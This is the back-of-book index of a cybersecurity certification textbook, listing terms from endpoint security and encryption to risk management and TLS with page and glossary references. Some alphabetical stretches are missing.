deadbolt lock, 201
decentralized computing architecture, G-8, 147
decentralized security governance, 421
deception technologies, G-8, 194
decommissioning, 289
DECT. see Digital Enhanced Cordless Telecommunications (DECT)
deduplication, G-8, 345
deep fake technology, 32
deep web, 237–238
default credentials, 26, 253
defaults, changing, 288–289
defense and military organizations, 422
defense in depth, G-8, 108, 115, 192, 193
Defense Information Systems Agency (DISA), 252
Elliptic Curve DHE (ECDHE), 65, 306
Elliptic Curve DSA (ECDSA), 45
email, 27, 32
  data loss prevention, 313
  encryption, 287, 294
  gateway, 312
  Internet header, 355
  mail delivery agent, 355
  mail transfer server, 100
  mail user agent, 355
  mailbox server, 100
  metadata, 355–356
  RFC 822 email address, 53
  security, 311–313
    Domain-based Message Authentication, Reporting & Conformance, 311–312
    DomainKeys Identified Mail, 311
    email gateway, 312
    Secure/Multipurpose Internet Mail Extensions, 312–313
    Sender Policy Framework, 311
  services, 309–311
    configuring mailbox access protocols on a server, 310
    Secure IMAPS, 311
    Secure POP, 310–311
    Secure SMTP, 309
    Simple Mail Transfer Protocol, 309
  soft tokens sent via, 77
  spam, 264, 304, 311, 312
embedded systems, G-10, 158–159
  attacks on, 160
  examples, 158
  Real-Time Operating Systems, 159
  solutions, S-11
Encapsulating Security Payload (ESP), G-10, 132
encoding, 319
Encrypting File System (EFS), 61
encryption, G-10, 482
  algorithms, 38–42, 417
    asymmetric, 41–42, 60–61
    cryptographic ciphers, 43–45
    digital signatures, 44
    hashing, 42–43
    key length, 40–41
    substitution, 39
    symmetric, 39–40, 60–61
    transposition, 39
  of backups, 178
  Bluetooth, 299
  database encryption, 62
  disk and file encryption, 61–62
  key exchange, 63–64
  levels, 61–62
    database-level encryption, 62
    file encryption, 61
    full-disk encryption, 61
    partition encryption, 61
    record-level encryption, 62
    volume encryption, 61
  near-field communication, 300
  standards, 417
  supporting confidentiality, 60–61
  techniques, 287
  transport/communication encryption, 63–64
End-of-Life (EOL), 212
endpoint configuration, 281–286
  access control, 282
  access control lists, 282–283
  application allow lists and block lists, 284
  configuration drift, 281
  configuration enforcement, 285
  file system permissions, 283–284
  group policy, 285
  lack of security controls, 281
  monitoring, 284–285
  principle of least privilege, 282
  SELinux, 285–286
  social engineering, 281
  vulnerabilities, 281
  weak configuration, 282
endpoint detection and response (EDR), G-10, 279–280
endpoint hardening, 274–276
  configuration baselines, 275–276
  operating system security, 274–275
  registry settings, 275–276
  workstations, 275
endpoint logs, G-10, 351
Endpoint Manager, 279, 288
endpoint protection, 276–279
  antimalware, 277
  antivirus software, 277
  disk encryption, 277–278
  installing, 288
  isolation, 277
  patch management, 279
  segmentation, 276–277
endpoint protection platform (EPP), 351, 364
endpoint security
  advanced endpoint protection, 279–281
  best practice baselines, 274–275
  endpoint configuration, 281–286
  endpoint hardening, 274–276
  endpoint protection, 276–279
  hardening specialized devices, 289–290
  hardening techniques, 286–289
  implementing, 274–291
  solutions, S-16
endpoint security, zero trust architectures and, 164
energy
  in ICS/SCADA applications, 160
  laws and regulations in, 419
enhanced detection and response (EDR), 351
enhanced open, 257
enterprise authentication, G-10, 258
enterprise local area network (LAN), 102
enterprise network architecture, 100–114
  architecture and infrastructure concepts, 100–101
  architecture considerations, 111–112
  attack surface, 108–109
  network infrastructure, 101–102
  physical isolation, 111
  port security, 109–110
  routing infrastructure considerations, 104–106
  security zones, 106–108
  solutions, S-8–9
  switching infrastructure considerations, 102–104
enterprise risk management (ERM), G-10, 446
entropy, 55, 56
entry/exit points, 199
environmental attack, G-10, 385
environmental design, security through, 199
environmental variables, G-10, 245–246
EOL. see End-of-Life (EOL)
EPP. see endpoint protection platform (EPP)
equipment
  disposal, 417
  physically securing, 253
equipment room, 104
eradication, in incident response, 334–335
ERM. see enterprise risk management (ERM)
error, 322
error handling, 321–322
escalated breach, G-10, 478
escrow, G-10, 57
ESD. see electrostatic discharge (ESD)
ESP. see Encapsulating Security Payload (ESP)
espionage, 21
EternalBlue exploit, 211
ethical hacking. see penetration testing
ethical principles, in reporting, 344
ETSI. see European Telecommunications Standards Institute (ETSI) IoT Security Standards
European Telecommunications Standards Institute (ETSI) IoT Security Standards, 162
European Union, regulations and laws in. see General Data Protection Regulation (GDPR)
evaluation scope, 222–223. see also target of evaluation (TOE)
Event Viewer, G-10, 349, 351
evidence integrity, 344
evil twin, G-10, 391
exception handling, G-10, 321
exception remediation, 247
exceptions, 321
executable file, 26
Execute (x), in Linux, 283
execution control policy, 284
exemptions, in remediation, 247
existing structures, 200–201
expansionary risk appetite, 448
explicit TLS, 309, 310
exposure factor (EF), G-10, 245, 441
extended detection and response (XDR), 280, 351
Extensible Authentication Protocol (EAP), G-11, 110, 259
Extensible Authentication Protocol over LAN (EAPoL), G-11, 110, 259
Extensible Configuration Checklist Description Format (XCCDF), 365–366
eXtensible Markup Language (XML), G-11, 95
  injection, 403–404
external assessments, 460–461, 462
external compliance reporting, 481
external examination, 462
external hard drives, full disk encryption and, 278
external media
  full device encryption, 294
  full disk encryption, 278
external threat actors, G-14, 17
extortion, G-11, 18

F

fabrication and manufacturing applications, 160
facial recognition, 75
facilities, 160
factors, G-11, 70
factory settings, 289
fail-closed, G-11, 117–118
fail-open, G-11, 117–118
failover, G-11, 189
failover tests, 189, 195
failure to enroll rate (FER), 75
fake telemetry, G-11, 194
false acceptance rate (FAR), G-11, 74
false match rate (FMR), 74
false negatives, G-11, 244, 268, 361
false non-match rate (FNMR), 74
false positives, G-11, 244, 268, 361
false rejection rate (FRR), G-11, 74
Family Educational Rights and Privacy Act (FERPA), 419
FAR. see false acceptance rate (FAR)
fast identity online (FIDO) universal 2nd factor (U2F), 76, 78
fault tolerance, G-11, 187
FDE. see full-disk encryption (FDE)
F-Droid Android application store, 217
Federal Information Processing Standards (FIPS), 45, 415, 443
Federal Information Security Modernization Act (FISMA), 417, 418, 419, 420
federation, G-11, 93–94
feedback, in security awareness training, 496
fencing, G-11, 199
FER. see failure to enroll rate (FER)
FERPA. see Family Educational Rights and Privacy Act (FERPA)
FIDO2/WebAuthn, 78
FIDO/U2F. see fast identity online (FIDO) universal 2nd factor (U2F)
field devices, 160
file integrity monitoring (FIM), G-11, 280–281
file system
  malicious code, 381
  permissions, 283–284
  snapshots, 177
File Transfer Protocol (FTP), G-11, 309
fileless malware, 374
files
  in e-discovery, 345
  encryption, 61–62
  metadata, 355
  transfer services, 309
FileVault, 61
FIM. see file integrity monitoring (FIM)
financial data, G-11, 471
financial interests, 454
financial motivations, of threat actors, 18
financial services, laws and regulations in, 419
fingerprint recognition, 75, 463
FIPS. see Federal Information Processing Standards (FIPS)
firewalls, 118–119
  configuration enforcement, 285
  device placement and attributes, 118–119
  hardware security, 254
  host-based, 287
  layer 4, 120
  layer 7, 121
  logical ports, 287
  misconfigured, 233
  next-generation, 125
  packet filtering, 118, 264
  router, 119
  rules in access control list, 263, 264
  stateful inspection, 120
  transparent, 119
  web application, 127
firewall logs, G-11, 352–353
firmware, 342
  peripheral device with malicious, 299
  port protection, 286
  updates, 289, 298
  vulnerabilities, 213, 279
first responder, G-11, 331
FISMA. see Federal Information Security Modernization Act (FISMA)
"Five Whys" model, 335
5 GHz network, 254, 256
flexibility, vendor diversity and, 193
flow label, 363
flow record, 363
FMR. see false match rate (FMR)
FNMR. see false non-match rate (FNMR)
forced proxy servers, 122–123
Forcepoint, 227
Forcepoint Insider Threat, 281
forensics. see digital forensics
forgery attacks, G-11, 401–403
  cross-site request forgery, 401–402
  server-side request forgery, 402–403
Fortify, 320
Forum of Incident Response and Security Teams, 243
forward proxy servers, 122–123, 227
forwarding functions, 101
FQDN. see fully qualified domain name (FQDN)
fraud, G-11, 18
Freenet, 237
FRR. see false rejection rate (FRR)
FTP. see File Transfer Protocol (FTP)
FTPES. see Explicit TLS (FTPES)
FTPS, G-12, 304, 305, 309
full device encryption and external media, 294
full-disk encryption (FDE), G-12, 61, 277, 278, 287
fully qualified domain name (FQDN), 51, 52, 102

G

Galois Counter Mode (GCM), 306
gamification, 490–491
gap analysis, G-12, 4–5
Gartner
  "Magic Quadrant" reports, 280
  market analysis, 268
gateways, 201–202. see also locks
GCMP. see AES Galois Counter Mode Protocol (GCMP)
GDPR. see General Data Protection Regulation (GDPR)
General Data Protection Regulation (GDPR), 179, 240, 313, 418, 419, 420, 473, 475, 476–477, 479
generators, 191
Generic Security Services Application Program Interface (GSSAPI), 136
geofencing, G-12, 295, 296
geographic access requirements, 473–474
geographic dispersion, G-12, 188
geographic restrictions, 474, 482
GeoIP, 86
geolocation, G-12, 86
geo-redundant storage (GRS), 148
GeoTrust, 48
GLBA. see Gramm-Leach-Bliley Act (GLBA)
global law, 418
Global Positioning System (GPS), G-12, 86, 294, 296
  Assisted GPS, 296
  GPS tagging, 295
  jamming or even spoofing, 296
Google App Engine, 144
Google BeyondCorp, 167
Google Chrome, 323
Google G Suite, 144
HIDS. see host intrusion detection systems (HIDS)
high availability (HA), G-13, 148, 186–189
  across zones, 148
  cloud as disaster recovery, 188–189
  downtime, calculating, 187
  fault tolerance and redundancy, 187
  scalability and elasticity, 187
  site considerations, 188
  testing redundancy and, 189
HIPAA. see Health Insurance Portability and Accountability Act (HIPAA)
HIPS. see host-based intrusion prevention (HIPS)
hiring (recruitment), 412
HKDF. see hash key derivation function (HKDF)
HMAC. see hash-based message authentication code (HMAC)
HMAC-based one-time password (HOTP), 76
home appliances, as embedded system, 158
Homeland Security Act, 443
honeyfiles, 194
honeynets, 194
honeypots, G-13, 194
honeytokens, 194
horizontal privilege escalation, G-13, 400
host intrusion detection systems (HIDS), G-13, 265, 280–281, 287
host key, 135
host node, 101
host operating system logs, 349–350
  Linux logs, 350
  macOS logs, 350
  Windows logs, 350
host-based firewalls, G-13, 287
host-based intrusion prevention (HIPS), G-13, 265, 280–281, 287
hosted private cloud, 142
host-to-host tunnel, 130
hot site, G-13, 188
hot storage, 148
HOTP. see HMAC-based one-time password (HOTP)
hotspots, tethering and, 297
HR. see Human Resources (HR)
HSM. see hardware security module (HSM)
HTML5 VPN, G-13, 134
HttpOnly attribute, 319
Human Resources (HR)
  identity and access management, 412, 413
  incident response, 330
  information security competencies, 11
  onboarding, 412, 413
  personnel management, 412
human vectors, 30
human-machine interfaces (HMIs), G-13, 159
human-readable data, G-13, 471
hybrid architecture, 143
hybrid cloud, G-13, 143–144
hybrid governance structures, 421
hybrid password attack, G-13, 394
hybrid/remote work training, 492
Hypertext Transfer Protocol (HTTP)
  file download, 309
  file transfer, 309
  protocol security, 304, 305
  Transport Layer Security, 305
Hypertext Transfer Protocol Secure (HTTPS)
  default port, 306
  protocol security, 304, 305
  Transport Layer Security, 305, 306
hypervisors, 213

I

IaaS. see infrastructure as a service (IaaS)
IaC. see infrastructure as code (IaC)
IAM. see identity and access management (IAM)
IBM
  MaaS360, 293
  QRadar User Behavior Analytics, 281
  X-Force Exchange, 234, 236
ICSs. see industrial control systems (ICSs)
ICV. see Integrity Check Value (ICV)
identification, G-13, 5
  files, in e-discovery, 345
  in IAM, 5–6
  in NIST Cybersecurity Framework, 3
identity and access management (IAM), G-13, 5–6, 412, 413
  authentication, 70–80
  authorization, 81–88
  identity management, 89–97
  zero trust architectures and, 164
identity management, 89–97
  directory services, 90–91
  federation, 93–94
  Linux authentication, 90
  Open Authorization, 96
  Security Assertion Markup Language, 95
  single sign-on authentication, 91–92
  single sign-on authorization, 92–93
  solutions, S-7–8
  Windows authentication, 89
identity proofing, 84
identity provider (IdP), G-13, 94
identity theft, 478
IdenTrust, 48
IdP. see identity provider (IdP)
IDS. see intrusion detection systems (IDS)
IEC. see International Electrotechnical Commission (IEC)
IEEE 802.1X, G-13, 109–110
IPS. see indoor positioning system (IPS); intrusion prevention systems (IPS)
IPsec. see Internet Protocol Security (IPsec)
IPS/IDS log, G-13, 358
IR. see incident reporting (IR); incident response (IR)
IRC. see internet relay chat (IRC)
ISACs. see Information Sharing and Analysis Centers (ISACs)
ISAs. see Interconnection Security Agreements (ISAs)
ISMS. see information security management system (ISMS)
ISO. see International Organization for Standardization (ISO)
ISOC best practice guide to evidence collection and archiving, 341
isolation, G-15, 277
  endpoint protection, 277
  isolation-based containment, 334
ISP. see Internet service provider (ISP)
ISSO. see Information Systems Security Officer (ISSO)
IT Infrastructure Library (ITIL), G-15, 174

J

jailbreaking, G-15, 217
jamming, of GPS, 296
JavaScript, 373
JavaScript Object Notation (JSON), G-15, 96, 151
JEDI. see Joint Enterprise Defense Infrastructure (JEDI)
JFS. see Journaled File System (JFS)
Jira, 185
JIT. see just-in-time (JIT)
Joe Sandbox, 323–324
Joint Enterprise Defense Infrastructure (JEDI), 167
Journaled File System (JFS), 178
journaling, G-15, 178
JSON. see JavaScript Object Notation (JSON)
JSON Web Token (JWT), 96
jump servers, G-15, 137
just-in-time (JIT), 87
JWT. see JSON Web Token (JWT)

K

KDC. see key distribution center (KDC)
KEK. see key encryption key (KEK)
Kerberos, G-15, 91–93, 94, 136, 394
Kerckhoffs's principle, 216
key, 39
  escrow, 57
  expiration, 55
  generation, 55–56
  management, 55, 417
  pair, 41, 51, 55, 60, 62, 64
  recovery, 392
  renewal, 55
  revocation, 55
  rotation, 216
  secret, 39
  session, 63, 394
  storage, 55
key distribution center (KDC), G-15, 91–93
  point-of-failure, 93
  single sign-on authentication, 91–92
  single sign-on authorization, 92–93
key encryption key (KEK), G-15, 60, 278
key exchange, G-15, 63–64
key fob token generator, 76–77
key length, G-15, 40–41, 417
key lock, 201
Key Management Interoperability Protocol (KMIP), 55
key management systems (KMS), G-15, 55, 216
key performance indicator (KPI), 451
key recovery agent (KRA), 57
Key Reinstallation Attacks (KRACK) vulnerability, 215
key risk indicator (KRI), 447
key stretching, G-15, 65
keyless lock, 201
keyloggers, G-15, 375
kill chain, G-15–16, 332–333
KMIP. see Key Management Interoperability Protocol (KMIP)
KMS. see key management systems (KMS)
knowledge-based authentication, 89
known environment penetration testing, 239, 464
KPI. see key performance indicator (KPI)
KRA. see key recovery agent (KRA)
KRACK attack, 215, 392
KRI. see key risk indicator (KRI)

L

LAN. see local area network (LAN)
Lansweeper, 173
laptops, full disk encryption and, 278
LastPass password manager, 73
lateral movement, G-16, 387, 397
law enforcement agencies, 422
layers
  firewall, 125–126
    layer 1 (inline) firewall, 119
    layer 2 (bridged) firewall, 119
    layer 3 (routed) firewall, 118
    layer 4 firewall, G-16, 120
    layer 7 firewall, G-16, 121
  load balancers
    layer 4, 126
    layer 7 (content switch), 126
  network infrastructure, 101–106, 108
LDAP. see Lightweight Directory Access Protocol (LDAP)
LDAP Secure (LDAPS), 304, 307–308
least privilege permission assignments, 83–84
  application and cloud monitors, 364
  data loss prevention, 365
  logs, 364
  system monitor, 364
  testing, 189
  vulnerability scanners, 364
motion recognition, 204
motion-based alarm, 204
motivations of threat actors, 17–19
  chaotic, 18
  data exfiltration, 18
  disinformation, 18
  financial, 18
  political, 19
  service disruption, 18
MOU. see memorandum of understanding (MoU)
Mozilla Thunderbird, 311
MS08-067 vulnerability, 211
MS17-010 update, 211
MSA. see master service agreement (MSA)
MSP. see managed services provider (MSP)
MTA. see message transfer agent (MTA)
MTBF. see mean time between failures (MTBF)
MTD. see maximum tolerable downtime (MTD)
MTTR. see mean time to repair/replace/recover (MTTR)
MUA. see mail user agent (MUA)
multi-cloud architectures, G-17, 142
multi-cloud strategies, 193–194
multifactor authentication (MFA), G-17, 73–74
  biometric or inherence factor, 73
  location-based authentication, 74
  ownership factor, 73, 76, 77
  privileged access management, 87
multipartite, 373
multi-tenant architecture, 143
multi-tenant (or public) cloud, 142
mutual authentication, 93

N

NAC. see network access control (NAC)
NAS device, 259
NAT. see network address translation (NAT)
national cybersecurity agencies, 422
National Institute of Standards and Technology (NIST), G-17–18, 3
  benchmarks, 252
  Cybersecurity Framework, 3, 240
  800-53 framework requirements, 366
  internal assessments required by, 462
  National Initiative for Cybersecurity Education, 11, 490
  National Vulnerability Database, 234, 243
  password best practices and, 72
  Risk Management Framework, 446
  security controls classified by, 9
  Special Publication 800-61, 413
  Special Publication 800-63, 415
  Special Publication 800-82, 160
  standardized configuration baselines, 285
  Triple DES deprecated by, 215
  zero trust architecture framework, 163, 165
National Vulnerability Database (NVD), 234, 243
nation-state actors, G-17, 20
NBAD. see network behavior and anomaly detection (NBAD)
NDAs. see non-disclosure agreements (NDAs)
near-field communication (NFC), G-18, 76, 202, 257, 300, 386
NERC. see North American Electric Reliability Corporation (NERC)
Nessus, 173, 231, 242
NetApp, 177
NetFlow, G-18, 363
network access control (NAC), G-18, 251, 260–261
network address translation (NAT), 134
Network and Information Systems (NIS) Directive, 418, 420
network attack, G-18, 386–387
  command and control, beaconing, and persistence, 387
  credential harvesting, 386
  data exfiltration, 387
  denial of service, 386
  lateral movement, pivoting, and privilege escalation, 387
  reconnaissance, 386
  weaponization, delivery, and breach, 386
network attack indicators, 385–407
  application attacks, 399–400
  credential replay attacks, 394–395
  cryptographic attacks, 396–397
  denial of service attacks, 387–388
  domain name system attacks, 390–391
  forgery attacks, 401–403
  injection attacks, 403–406
  malicious code indicators, 397
  network attacks, 386–387
  on-path attacks, 389–390
  password attacks, 393–394
  physical attacks, 385–386
  replay attacks, 400–401
  solutions, S-21
  wireless attacks, 391–392
PDF documents with JavaScript enabled, 373
PDU. see power distribution unit (PDU)
PEAP, 259
peer-to-peer (P2P) networks, 66, 147
penalties, for noncompliance, 480
penetration tester vs. attacker, 223
penetration testing, G-20, 238–239, 455, 463–466
  active reconnaissance, 463–464
  continuous pentesting, 466
  defensive penetration testing, 466
  exercise types, 465–466
  integrated penetration testing, 466
  known environment penetration testing, 239, 464
  offensive penetration testing, 465
  partially known environment penetration testing, 239, 464, 465
  passive reconnaissance, 464
  physical penetration testing, 466
  solutions, S-24–25
  steps in, 463
  unknown environment penetration testing, 238, 464, 465
people, authenticating, 6
percent encoding, G-20, 406
perfect forward secrecy (PFS), G-20, 64–65
performance indicators, 496
perimeter network, 265
perimeter security, overdependence on, 109
peripherals, malicious, 299
permissions, G-20, 81
  Bluetooth, 299
  permissions assignment, creating, 85
  restrictions, 294, 295, 483
persistence (load balancing), G-20, 127, 387, 397
persistent storage, 275
personal area networks (PANs), G-20, 297
personal assets, 414
personal data, 418
personal identification number (PIN), G-20, 71, 74, 76, 256–257
Personal Information Protection and Electronic Documents Act (PIPEDA), 418
personal relationships, 455
personally owned devices in the workplace, use of, 489
personnel management, 412
personnel policies, 488–497
  conduct policies, 488–489
  solutions, S-26
  training topics and techniques, 490–494 (see also security awareness training)
  user and role-based training, 489–490
persuasive/consensus/liking, 31
PFS. see perfect forward secrecy (PFS)
PGP (Pretty Good Privacy), 287
pharming, G-20, 33
phishing, G-20, 32, 304, 311, 312, 313
  campaigns, 493
  simulations, 496
physical access control system (PACS), 202
physical attacks, G-20, 385–386
  brute force physical attack, 385
  environmental attack, 385
  RFID cloning, 385–386
  RFID skimming, 386
physical isolation, 111
physical locks, 201
physical penetration testing, G-20, 466
physical security, 198–206
  alarm systems, 204
  barricades and entry/exit points, 199
  bollards, 199–200
  controls, 8–9, 198
  existing structures, 200–201
  fencing, 199
  gateways and locks, 201–202
  industrial camouflage, 200
  lighting, 199
  physical access control system, 202
  security guards, 203
  sensors, 205
  solutions, S-12–13
  standards, 416–417
  testing, 466
  through environmental design, 199
  video surveillance, 203–204
Pi-hole, 314
PIN. see personal identification number (PIN)
PIPEDA. see Personal Information Protection and Electronic Documents Act (PIPEDA)
PIR sensors. see passive infrared (PIR) sensors
pivoting, G-20, 387, 397
PKCS. see public key cryptography standards (PKCS)
PKI. see public key infrastructure (PKI)
platform as a service (PaaS), G-20, 144–145
platform diversity, 192
platform-agnostic solutions, 293
plausible deniability, 20
playbooks, G-20, 333, 413
PLCs. see Programmable Logic Controllers (PLCs)
pluggable authentication module (PAM), G-20, 90
plug-ins, 242–243, 268
PMK. see pairwise master key (PMK)
PNAC. see Port-based Network Access Control (PNAC)
point-of-sale (PoS) machines, 300
Point-to-Point Tunneling Protocol (PPTP), G-20, 130
  reduction, 444
  remediation, 444
  response, identifying, 446
  sharing, 444
risk acceptance, G-23, 444–445
risk analysis, G-23, 441
risk analysis using words, not numbers, 442
Risk and Control Self-Assessment (RCSA), 446
risk appetite, G-23, 445, 447, 448
risk assessment, G-23, 16, 440–441
risk avoidance, G-23, 444
risk deterrence, G-23, 444
risk exception, G-23, 444
risk exemption, G-23, 445
risk identification, G-23, 440
Risk Management Framework (RMF), 446
risk management processes and concepts, G-23, 440–452
  business impact analysis, 448–451
  heat map, 443
  inherent risk, 442–443
  qualitative risk analysis, 442
  quantitative risk analysis, 441–442
  risk analysis, 441
  risk assessment, 440–441
  risk identification, 440
  risk management processes, 445–448
  risk management strategies, 444–445
  solutions, S-23–24
risk mitigation, G-23, 444
risk owner, G-23, 447
risk register, G-23–24, 446
risk reporting, G-24, 448
risk threshold, G-24, 447
risk tolerance, G-24, 246, 447
risk transference, G-24, 112, 444
risky behaviors, recognizing, 493–494
risky login policy, 86
Rivest, Shamir, Adelman (RSA), 42, 45, 49, 60, 216, 306
RNA. see retrospective network analysis (RNA)
robotics, 204
RoE. see rules of engagement (RoE)
rogue access points, 391–392
rogue server, 309
ROI. see return on investment (ROI)
role-based access control (RBAC), G-24, 82–83, 282
roles and responsibilities, in rules of engagement, 458
root cause analysis, G-24, 335
root certificate authority, G-24, 49
root of trust model, 49–50
rooting, G-24, 216
rootkits, 373, 377
round robin scheduling, 126
routed (layer 3) firewall, 118
router firewall, G-24, 119
routers, 102, 253
routing infrastructure considerations, 104–106
  Internet Protocol, 104–105
  virtual LANs, 105–106
RPO. see recovery point objective (RPO)
RSA. see Rivest, Shamir, and Adelman (RSA)
RTO. see recovery time objective (RTO)
RTOS. see real-time operating systems (RTOS)
rule-based access control, G-24, 83
rules of engagement (RoE), G-24, 458

S

SA. see security association (SA)
SaaS. see software as a service (SaaS)
SAE. see Simultaneous Authentication Of Equals (SAE)
Salesforce, 144
salt, G-24, 65
SAM. see Security Account Manager (SAM)
SameSite attribute, 319
SAML. see security assertion markup language (SAML)
Samsung Pay, 300
SAN. see Storage Area Network (SAN); subject alternative name (SAN)
sanctions, 479
sandboxing, G-24, 323–324
  sandbox execution, 380
  sandboxed lab system, 286
sanitization, G-24, 179, 213
Sarbanes-Oxley Act (SOX), G-24, 252, 417, 443
SASE. see Secure Access Service Edge (SASE)
SASL. see Simple Authentication and Security Layer (SASL)
SAST. see static and dynamic application security testing (SAST)
satellites, in GPS, 296
SAW. see secure administrative workstation (SAW)
SBOM. see software bill of materials (SBOM)
SCA. see software composition analysis (SCA)
SCADA. see supervisory control and data acquisition (SCADA)
scalability, G-24, 111
  of cloud architecture features, 154
  data backups, 175
  high availability, 187
  power provisioning, 155
SCAP. see Security Content Automation Protocol (SCAP)
SCAP Compliance Checker (SCC), 252
scareware, 378
SCC. see SCAP Compliance Checker (SCC)
SCCM. see System Center Configuration Manager (SCCM)
scheduling algorithm, 126
scope, of incident response, 332
screened subnet, G-24, 265
script virus, 373
scripting, automation and, 433–434
SD card slot. see Micro Secure Digital (SD) card slot
SDLC. see software development life cycle (SDLC)
SDN. see software defined networking (SDN)
SD-WAN. see software-defined WAN
SEAndroid, 286
search, in e-discovery, 345
secret (confidential) data, 472, 474. see also privacy data
secret key, 39
Secure Access Service Edge (SASE), G-24, 156
secure administrative workstation (SAW), 87, 126
secure baseline, G-24, 252. see also network security baselines
secure coding techniques, 318–321
    code signing, 320–321
    cookies, 319
    input validation, 318–319
    static code analysis, 319–320
secure communications, 129–138
    Internet Key Exchange, 133–134
    internet protocol security tunneling, 132–133
    jump servers, 137
    out-of-band management, 136–137
    remote access architecture, 129–130
    remote desktop, 134
    Secure Shell, 135–136
    solutions, S-9–10
    transport layer security tunneling, 130–132
secure configuration of servers, 254
secure data destruction, 179–180
secure directory services, 307–308
secure email transmission (SMTP), 216
secure enclaves, G-24, 57
Secure File Transfer Protocol (SFTP), G-24–25, 135, 216, 304, 309
secure hash algorithm (SHA), G-25, 43, 306, 344
    SHA-1, 215
    SHA256, 43, 44, 68, 306, 307, 393
    SHA384, 306
    SHA512, 68
secure IMAP (IMAPS), 304, 311
secure management protocols, 253
secure password transmission, 416
Secure POP (POP3S), 310–311
secure protocols, 304–305
Secure Shell (SSH), G-25, 90, 135–136, 309
    client authentication, 135–136
        Kerberos, 136
        public key authentication, 135
        username/password, 135
    commands, 136
Secure SMTP (SMTPS), 304, 309
secure transmission of credentials, 412
Secure/Multipurpose Internet Mail Extensions (S/MIME), 287, 312–313
security
    changes, 429
    compliance, 479–480
    controls, lack of, 281
    in e-discovery, 345
    groups, 434
    guards, 203
    key, 76
    operations, mapping course content, A-11–18
    requirements, in rules of engagement, 458
    standards, 290
    zero trust architectures and, 164
Security Account Manager (SAM), 89, 394–395
security architecture
    mapping course content, A-8–11
    resilience, 171
    review, 223
security assertion markup language (SAML), G-25, 95
security association (SA), 133
security awareness training, 491–496
    hybrid/remote work training, 492
    insider threat training, 491
    lifecycle, 494–496
        assessments and quizzes, 495
        development and execution of training, 495
        illustrated, 494
        incident reporting, 495
        metrics and performance indicators, 496
        observations and feedback, 496
        phishing simulations, 496
        reporting and monitoring, 495–496
        training completion rates, 496
    operational security training, 492
    password management training, 491
    phishing campaigns, 493
    policy and handbook training, 491
    removable media and cable training, 491
    risky behaviors, recognizing, 493–494
    situational awareness training, 491
    social engineering training, 492
security concepts
    access control, 5–6
    authentication, authorization, and accounting, 6
    identity and access management, 5–6
    CIA Triad, 2
    gap analysis, 4–5
    information security (infosec), 2
    mapping course content, A-1–4
    NIST Cybersecurity Framework, 3
    non-repudiation, 2
    security controls, 8–13
        categories of, 8–9
        functional types of, 9–10
        information security business units, 11–12
        information security competencies, 11
        information security roles and responsibilities, 10–11
        outcomes achieved by implementing, 4
        solutions, S-1
Security Content Automation Protocol (SCAP), G-25, 243, 252, 365–366
    Compliance Checker, 252
    Extensible Configuration Checklist Description Format, 365–366
    Open Vulnerability and Assessment Language, 365
security controls, G-25, 8–13
    actively testing, 463
    bypassing, 463
    categories of, 8–9
        managerial, 8–9
        operational, 8–9
        physical, 8–9
        technical, 8–9
    function of, 8
    functional types of, 9–10
        compensating, 10
        corrective, 9, 10
        detective, 9, 10
        deterrent, 10
        directive, 9
        preventive, 9, 10
    information security business units, 11–12
        DevSecOps, 12
        incident response, 12
        security operations center, 11–12
    information security competencies, 11
    information security roles and responsibilities, 10–11
        Chief Information Officer, 10
        Chief Security Officer, 10
        Chief Technology Officer, 10
        Information Systems Security Officer, 11
    outcomes achieved by implementing, 4
    solutions, S-1–2
security governance
    automation, 433–436
        orchestration implementation, 435–436
        scripting, 433–434
    change management, 425–432
        allowed and blocked changes, 427–428
        dependencies, 429
        documentation and version control, 430–431
        downtime, 428–430
        legacy systems and applications, 430
        programs, 425–427
        restarts, 428–429
    governance and accountability, 420–423
    legal environment, 417–420
    policies, 410–411
    procedures, 412–414
    standards, 414–417
security identifier (SID), G-25, 85, 92
security information and event management (SIEM), G-25, 174, 236, 268, 358–359
    agent-based and agentless collection, 359
    for automated reports, 348
    endpoint logs, 351
    in incident response, 329, 331
    intelligence fusion techniques, 338
    log aggregation, 359
    packet captures, 354
    solutions, S-19–20
security key, G-25, 76
Security Knowledge Framework, 318
security log, G-25, 349
Security Onion, 266–267, 331, 338, 353, 388
security operations center (SOC), 11–12, 330
security orchestration, automation and response (SOAR), 329
security program management and oversight, mapping course content, A-18–22
Security Technical Implementation Guides (STIGs), 252
security zones, G-25, 106–108
Security-Enhanced Linux (SELinux), G-25, 285–286
SED. see self-encrypting drive (SED)
segmentation, 246, 483
    endpoint protection, 276–277
    logical, 104
segmentation-based containment, 334
SEH. see structured exception handler (SEH)
selection of effective controls, G-25, 115
self-assessments, 461
self-encrypting drive (SED), G-25, 61, 278
self-signed certificate, G-25, 50
SELinux. see Security-Enhanced Linux (SELinux)
Sender Policy Framework (SPF), G-25, 304, 311, 312
sensitive data, 473
sensors, G-25, 117, 123, 205, 359
    infrared sensors, 205
    microwave sensors, 205
    pressure sensors, 205
    ultrasonic sensors, 205
threat vectors, 16, 23–27
    human vectors, 30
    lure-based vectors, 26–27
    message-based vectors, 27
    network vectors, 25–26
    vulnerable software vectors, 24–25
3DES. see Triple DES (3DES)
throughput (speed), 75
ticket granting service (TGS), 91–93, 136
    illustrated, 93
    session key, 92
    single sign-on authentication, 91–92
    single sign-on authorization, 92–93
    ticket, 92
ticket granting ticket (TGT), G-28, 91–92, 136, 394
ticketing, 434
time stamp, 92, 93
time-based one-time password (TOTP), 76
time-based restrictions, 86
timeline, G-28, 343
time-of-check to time-of-use (TOCTOU), G-28, 220
time-of-day restrictions, G-28, 86
TKIP. see Temporal Key Integrity Protocol (TKIP)
TLS. see Transport Layer Security (TLS)
TLS VPN. see Transport Layer Security virtual private network (TLS VPN)
TOCTOU (time-of-check to time-of-use), 220
token-based key card lock, 201
tokenization, G-28, 66, 483
tokens
    generation of, 76
    hard authentication, 76–77
    soft authentication, 77
tombstone, 485
top secret (critical) data, 472
TOR (The Onion Router), 147, 237
total cost of ownership (TCO), 174
TOTP. see time-based one-time password (TOTP)
TP-LINK SOHO access point, 256
TPM. see trusted platform module (TPM)
tracking cookies, 375
trade secrets, G-28, 471
training, 337, 412
training topics and techniques, 490–494
    anomalous behavior recognition, 493
    computer-based training, 490–491
    gamification, 490–491
    phishing campaigns, 493
    risky behaviors, recognizing, 493–494
    security awareness training, 491–492
Transmission Control Protocol (TCP), 102, 305
transparent data encryption (TDE), 62
transparent firewall, 119
transparent modes, 119
transparent proxy servers, G-28, 122–123
Transport Layer Security (TLS), G-28, 63, 125, 130, 305–307
    cipher suites, 306–307
    handshake, 306, 307
    implementing, 305–306
    protocol security, 305
    SSL/TLS versions, 306
